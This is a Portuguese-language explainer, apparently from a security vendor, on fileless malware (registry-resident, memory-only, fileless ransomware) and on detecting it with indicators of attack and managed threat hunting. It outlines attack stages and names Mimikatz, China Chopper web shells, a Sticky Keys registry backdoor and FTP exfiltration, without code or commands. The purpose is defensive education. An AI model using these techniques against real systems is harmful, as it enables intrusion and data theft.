Malware residente no registro

Malware residente no registro é aquele que se instala no registro do Windows para permanecer persistente e evitar a detecção. Em um ataque de malware tradicional, os sistemas Windows podem ser infectados por meio do uso de um programa dropper que baixa um arquivo malicioso. Esse arquivo malicioso permanece ativo no sistema alvo, o que o torna vulnerável à detecção por software antivírus (AV). Malware sem arquivo também pode usar um programa dropper, mas ele não baixa um arquivo malicioso. Em vez disso, o próprio programa dropper grava o código malicioso diretamente no registro do Windows.

O código malicioso pode ser programado para ser iniciado sempre que o sistema operacional for iniciado, e não há nenhum arquivo malicioso para descobrir — o código malicioso fica oculto em arquivos nativos não sujeitos à detecção de antivírus.

A variante mais antiga desse tipo de ataque é o Poweliks, mas muitas outras surgiram desde então, incluindo o Kovter e o GootKit. Malwares que modificam chaves de registro têm grande probabilidade de permanecer ativos sem serem detectados por longos períodos.

Malware somente de memória

Malwares que atuam somente na memória residem apenas na memória. Um exemplo de malware que atua somente na memória é o worm Duqu, que pode permanecer indetectável por residir exclusivamente na memória. O Duqu 2.0 está disponível em duas versões: a primeira é um backdoor que permite ao adversário se estabelecer em uma organização. O adversário pode então usar a segunda versão do Duqu 2.0, que oferece recursos adicionais, como reconhecimento, movimentação lateral e exfiltração de dados. O Duqu 2.0 foi usado para violar com sucesso empresas do setor de telecomunicações e pelo menos um conhecido fornecedor de software de segurança.

Ransomware sem arquivo

Os adversários não se limitam a um único tipo de ataque. Eles utilizam qualquer tecnologia que os ajude a capturar sua carga útil. Hoje, os invasores de ransomware utilizam técnicas sem arquivo para incorporar código malicioso em documentos. Eles conseguem isso usando linguagens de script nativas, como macros, ou gravando o código malicioso diretamente na memória por meio de um exploit. O ransomware então sequestra ferramentas nativas, como o PowerShell, para criptografar arquivos reféns sem nunca ter gravado uma única linha no disco.

Estágios de um ataque sem arquivo

A seguir estão os estágios de um ataque de malware sem arquivo:

Etapa 1: Obtenha acesso

Técnica: Explorar remotamente uma vulnerabilidade e usar scripts da web para acesso remoto (por exemplo, China Chopper)

O invasor obtém acesso remoto ao sistema da vítima para estabelecer uma base para seu ataque.

Etapa 2: Roubar credenciais

Técnica: Variedade de técnicas (ex.: Mimikatz)

Usando o acesso obtido na etapa anterior, o invasor agora tenta obter credenciais para o ambiente comprometido, permitindo que ele se mova facilmente para outros sistemas naquele ambiente.

Etapa 3: Manter a persistência

Técnica: Modifique o registro para criar um backdoor (por exemplo, ignorar Sticky Keys)

Agora, o invasor configura um backdoor que lhe permitirá retornar a esse ambiente sem precisar repetir os passos iniciais do ataque.

Etapa 4: Exfiltração de dados

Técnica: Use o sistema de arquivos e o utilitário de compactação integrado para coletar dados e, em seguida, use o FTP para fazer upload dos dados

Na etapa final, o invasor coleta os dados e os prepara para exfiltração, copiando-os em um local e compactando-os usando ferramentas de sistema facilmente disponíveis, como o Compact. O invasor então remove os dados do ambiente da vítima, enviando-os via FTP.

Como detectar malware sem arquivo

Se antivírus legados, listas de permissões, sandboxing e até mesmo métodos de aprendizado de máquina não conseguem proteger contra ataques sem arquivo, o que resta? As organizações podem se proteger adotando uma abordagem integrada que combina vários métodos.

Confie em indicadores de ataque em vez de apenas indicadores de comprometimento

Indicadores de Ataque (IOAs) permitem que as organizações adotem uma abordagem proativa para prevenir ataques sem arquivo. Em vez de se concentrar em como um ataque foi executado, os IOAs procuram sinais de que um ataque possa estar em andamento. Não importa se uma ação foi iniciada a partir de um arquivo no disco rígido ou de uma técnica sem arquivo. O que importa é a ação executada, como ela se relaciona com outras ações, sua posição em uma sequência e suas ações dependentes. Esses indicadores revelam as verdadeiras intenções e objetivos por trás dos comportamentos e dos eventos ao seu redor.

IOAs incluem sinais como execução de código, movimento lateral e ações que parecem ter a intenção de encobrir sua verdadeira intenção. Eles buscam sequências de eventos que até mesmo malwares sem arquivo devem executar para cumprir sua missão.

E como os IOAs examinam a intenção, o contexto e as sequências, eles podem até mesmo detectar e bloquear atividades maliciosas realizadas usando uma conta legítima, o que geralmente acontece quando um invasor usa credenciais roubadas.

Empregar caça gerenciada de ameaças

A busca por ameaças de malware sem arquivo é um trabalho demorado e trabalhoso que exige a coleta e a normalização de grandes quantidades de dados. Mas, como é uma parte necessária da proteção contra ataques sem arquivo, a abordagem mais pragmática para a maioria das organizações é delegar a busca por ameaças a um provedor especializado.

Os serviços gerenciados de detecção de ameaças estão de plantão 24 horas por dia, buscando intrusões de forma proativa, monitorando o ambiente e reconhecendo atividades sutis que podem passar despercebidas pelas tecnologias de segurança padrão.